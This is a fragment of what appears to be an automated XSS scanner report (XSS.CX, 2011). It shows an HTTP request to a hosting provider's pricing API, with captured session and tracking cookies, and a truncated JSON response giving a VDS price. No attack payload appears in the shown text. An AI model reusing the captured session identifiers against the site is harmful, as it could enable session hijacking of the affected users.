Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=
Content-Length: 57

{"method":"getVDSPrice","params":[1,1,100,"vdslinuxset"]}

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain;charset=utf-8
Content-Length: 249

{"result":{"errorMessage":null,"priceBrutto":{},"price":{},"error":false,"priceStringBrutto":"49.99","errorCode":null,"campaignPriceBrutto":{},"campaignPriceString":"0.00","campaignPriceStringBrutto":
...[SNIP]...

Report generated by XSS.CX at Sun Mar 20 13:56:02 CDT 2011.